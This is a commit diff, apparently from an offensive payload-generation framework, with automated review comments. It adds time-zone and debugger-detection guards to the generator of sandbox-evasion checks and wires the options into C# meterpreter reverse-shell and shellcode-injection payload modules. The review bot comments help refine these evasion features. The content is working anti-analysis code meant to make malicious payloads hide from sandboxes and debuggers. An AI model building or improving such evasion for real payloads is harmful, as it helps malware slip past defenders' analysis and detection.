added CS
ChrisTruncer committed Jul 23, 2017
1 parent 96a0765 commit a5cbee0
Showing 6 changed files with 29 additions and 2 deletions.
21 changes: 19 additions & 2 deletions Tools/Evasion/evasion_common/gamemaker.py
Expand Up @@ -449,7 +449,7 @@ def senecas_games(evasion_payload):
check_code += '\t' * num_tabs_required + 'my $' + min_disksize + ' = ' + evasion_payload.required_options['DISKSIZE'][0] + ';\n'
check_code += '\t' * num_tabs_required + 'my $' + file_object + ' = Win32::OLE->CreateObject("Scripting.FileSystemObject");\n'
check_code += '\t' * num_tabs_required + 'my $' + real_disksize + ' = $' + file_object + '->GetDrive("C:")->{TotalSize}/1073741824.0;\n'
check_code += '\t' * num_tabs_required + 'if ($' + min_disksize + ' > $' + real_disksize + ') {\n'
check_code += '\t' * num_tabs_required + 'if ($' + min_disksize + ' < $' + real_disksize + ') {\n'

# Add a tab for this check
num_tabs_required += 1
Expand Down Expand Up @@ -494,7 +494,7 @@ def senecas_games(evasion_payload):
check_code += '\t' * num_tabs_required + 'my $' + perl_wmi + ' = Win32::OLE->GetObject("winmgmts:\\\\\\\\localhost\\\\root\\\\CIMV2") or die;\n'
check_code += '\t' * num_tabs_required + 'my $' + reg_dump + ' = $' + perl_wmi + '->ExecQuery("SELECT CurrentSize from Win32_Registry") or die;\n'
check_code += '\t' * num_tabs_required + 'my $' + reg_size + ';\n'
check_code += '\t' * num_tabs_required + 'foreach my $' + perl_reg_obj + ' (in $' + reg_dump + ') { $' + reg_size + ' = $regObj->CurrentSize; }\n'
check_code += '\t' * num_tabs_required + 'foreach my $' + perl_reg_obj + ' (in $' + reg_dump + ') { $' + reg_size + ' = $' + perl_reg_obj + '->CurrentSize; }\n'
check_code += '\t' * num_tabs_required + 'if ($' + reg_size + ' > $' + reg_mb_size + ') {\n'

# Add a tab for this check
Expand Down Expand Up @@ -694,6 +694,23 @@ def senecas_games(evasion_payload):

# Add a tab for this check
num_tabs_required += 1

if evasion_payload.required_options["TIMEZONE"][0].lower() != 'x':

check_code += '\t' * num_tabs_required + 'if (TimeZone.CurrentTimeZone.StandardName != "Coordinated Universal Time") {\n'

# Add a tab for this check
num_tabs_required += 1

if evasion_payload.required_options["DEBUGGER"][0].lower() != 'x':

check_code += '\t' * num_tabs_required + 'if (!System.Diagnostics.Debugger.IsAttached) {\n'

# Add a tab for this check
num_tabs_required += 1

if evasion_payload.required_options["BADMACS"][0].lower() != 'x':


if evasion_payload.required_options["DOMAIN"][0].lower() != "x":

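Review bot: The new TIMEZONE and DEBUGGER branches subscript `evasion_payload.required_options` directly, so any payload that reaches this code without declaring those keys fails with KeyError instead of simply skipping the check; the five payload files in this commit add the keys, but nothing here enforces that. Reading them with a default, `if evasion_payload.required_options.get("TIMEZONE", ["X"])[0].lower() != 'x':` (and likewise for `"DEBUGGER"`), keeps the check opt-in for payloads that never declare it. The option value is only ever compared with 'x' and is otherwise unused, which is worth a comment above the two blocks such as `# TIMEZONE / DEBUGGER are on/off toggles: any value other than X enables the guard`. senecas_games continues outside the hunk, so the closing braces for the two newly opened blocks are not visible here; presumably they are emitted where num_tabs_required is unwound, but that should be confirmed.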
2 changes: 2 additions & 0 deletions Tools/Evasion/payloads/cs/meterpreter/rev_http.py
Expand Up @@ -46,6 +46,8 @@ def __init__(self, cli_obj):
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"TIMEZONE" : ["X", "Optional: Check to validate not in UTC"],
"DEBUGGER" : ["X", "Optional: Check if debugger is attached"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}

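Review bot: The help text for the two new options does not say how they are enabled: unlike PROCESSORS or DOMAIN, whose value is consumed, TIMEZONE and DEBUGGER appear to act as on/off toggles (gamemaker.py in this commit only compares the value with "x"), so a user cannot tell whether to supply a zone name or just any non-X value. Suggest `"TIMEZONE" : ["X", "Optional: Set to any value other than X to require a non-UTC time zone"],` and `"DEBUGGER" : ["X", "Optional: Set to any value other than X to require that no debugger is attached"],`. The same two lines are repeated verbatim in rev_https.py, rev_tcp.py, shellcode_inject/base64.py and shellcode_inject/virtual.py; a shared constant in evasion_common would keep the wording in one place. The enclosing __init__ starts outside the hunk.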
2 changes: 2 additions & 0 deletions Tools/Evasion/payloads/cs/meterpreter/rev_https.py
Expand Up @@ -46,6 +46,8 @@ def __init__(self, cli_obj):
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"TIMEZONE" : ["X", "Optional: Check to validate not in UTC"],
"DEBUGGER" : ["X", "Optional: Check if debugger is attached"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}

2 changes: 2 additions & 0 deletions Tools/Evasion/payloads/cs/meterpreter/rev_tcp.py
Expand Up @@ -45,6 +45,8 @@ def __init__(self, cli_obj):
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"TIMEZONE" : ["X", "Optional: Check to validate not in UTC"],
"DEBUGGER" : ["X", "Optional: Check if debugger is attached"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}

2 changes: 2 additions & 0 deletions Tools/Evasion/payloads/cs/shellcode_inject/base64.py
Expand Up @@ -49,6 +49,8 @@ def __init__(self, cli_obj):
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"TIMEZONE" : ["X", "Optional: Check to validate not in UTC"],
"DEBUGGER" : ["X", "Optional: Check if debugger is attached"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}

2 changes: 2 additions & 0 deletions Tools/Evasion/payloads/cs/shellcode_inject/virtual.py
Expand Up @@ -48,6 +48,8 @@ def __init__(self, cli_obj):
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"TIMEZONE" : ["X", "Optional: Check to validate not in UTC"],
"DEBUGGER" : ["X", "Optional: Check if debugger is attached"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}

